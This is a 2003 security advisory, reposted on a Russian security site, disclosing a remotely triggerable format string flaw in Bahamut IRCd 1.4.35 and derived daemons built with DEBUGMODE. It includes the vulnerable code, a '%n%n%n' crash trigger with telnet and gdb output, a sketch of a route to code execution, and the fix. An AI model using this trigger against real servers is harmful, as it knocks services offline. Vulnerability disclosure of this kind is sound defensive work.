Информационная безопасность
[RU] switch to English

Дополнительная информация

  Ошибка форматной строки в Bahamut IRCd (format string)

From:Joel Eriksson <je-fulldisclosure_(at)_bitnux.com>
Date:26 июня 2003 г.
Subject:[Full-Disclosure] Bahamut IRCd <= 1.4.35 and several derived daemons

Hash: SHA1

0xbadc0ded Advisory #01 - 2003/06/26 - Bahamut IRCd <= 1.4.35 and others

Reference      http://0xbadc0ded.org/advisories/0301.txt
PGP-key        http://0xbadc0ded.org/advisories/pubkey.asc

Application    Bahamut IRCd <= 1.4.35 and several derived daemons
Discovered By  Anonymous 0xbadc0ded.org affiliate
Researched By  Joel Eriksson <[email protected]>


 Bahamut IRCd is the official IRC daemon of DALnet and a popular ircd
 in general. There are also a number of daemons based on Bahamut.


 A remotely exploitable format string vulnerability exists in the
 latest version of Bahamut (1.4.35 at the time of writing) and many
 IRC daemons derived from it. Of the five daemons we have investigated,
 four of them were vulnerable. These are:

 The following daemon had already fixed the bug:


 For the vulnerability to appear, the server must be compiled with
 DEBUGMODE defined. This is the vulnerable code in src/s_debug.c:

     if (level == DEBUG_ERROR)
         syslog(LOG_ERR, debugbuf);

 One way to trigger the bug is simply to connect to the server and
 send the format string to be sent through syslog(). This is due to
 the following in src/parse.c (from bahamut-1.4.35):

     Debug((DEBUG_ERROR, "Unknown (%s) from %s",
         ch, get_client_name(cptr, TRUE)));


 A DoS-attack is simple, just send a string consisting of a few %n's
 and the server will die with a segmentation fault due to trying to
 dereference and write to a NULL-pointer. Example:

   [[email protected] ~]$ telnet 6667
   Connected to
   Escape character is '^]'.
   :server.dal.net NOTICE AUTH :*** Looking up your hostname...
   :server.dal.net NOTICE AUTH :*** Checking Ident
   :server.dal.net NOTICE AUTH :*** Found your hostname
   :server.dal.net NOTICE AUTH :*** No Ident response
   Connection closed by foreign host.
   [[email protected] ~]$ telnet 6667
   telnet: Unable to connect to remote host: Connection refused
   [[email protected] ~]$

 And this is from a gdb-session on bahamut during the attack:

   Program received signal SIGSEGV, Segmentation fault.
   0x2f1e4e71 in vfprintf () from /lib/libc.so.6
   (gdb) x/i$pc
   0x2f1e4e71 <vfprintf+9857>:     mov    %ecx,(%eax)
   (gdb) i r eax
   eax            0x0      0
   (gdb) bt
   #0  0x2f1e4e71 in vfprintf () from /lib/libc.so.6
   #1  0x2f2711b2 in vsyslog () from /lib/libc.so.6
   #2  0x2f27101d in syslog () from /lib/libc.so.6
   #3  0x08064554 in debug (level=791434068, pattern=0x0) at s_debug.c:132
   #4  0x08057096 in parse (cptr=0x2f506440, buffer=0x2f506534 "%n%n%n", bufend=0x2f50653a "") at parse.c:212
   #5  0x08056f29 in client_dopacket (cptr=0x2f506440, buffer=0x0, length=9) at packet.c:236
   #6  0x08060668 in do_client_queue (cptr=0x2f506440) at s_bsd.c:1410
   #7  0x08061070 in read_message (delay=1, listp=0x81cddc0) at s_bsd.c:2131
   #8  0x080551e8 in io_loop () at ircd.c:1211
   #9  0x08054a8e in main (argc=0, argv=0x1) at ircd.c:991
   #10 0x2f1aedc4 in __libc_start_main () from /lib/libc.so.6
   (gdb) detach
   Detaching from program: /home/je/audit/bahamut-1.4.35/src/ircd, process 27284

 To use this bug for executing code on the target you would have to be
 a bit more creative, since debugbuf is a global variable and thus not
 on the stack. One way would be to overwrite the saved ebp in debug()
 to control ebp in the function that called debug() and thus the eip
 when returning from there.


 Edit src/s_debug.c and change:

   syslog(LOG_ERR, debugbuf);


   syslog(LOG_ERR, "%s", debugbuf).

Disclosure Timeline

 2003/06/25 Notified developers of the vulnerable IRC-daemons.
 2003/06/26 Public release

The 0xbadc0ded.org team is hosted and sponsored by Bitnux: www.bitnux.com

Bitnux is a newly founded company located in Sweden focused on security
research and system development. We offer services such as:

 - Code Reviews
 - Exploit Development
 - Reverse Engineering of Code
 - Security Revisions of Systems and Software
 - Custom System Development for Unix/Linux/BSD and Windows

E-mail : [email protected]
Phone  : +46-70-228 64 16
Chat   : http://bitnux.com/live

Version: GnuPG v1.2.1 (GNU/Linux)

Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород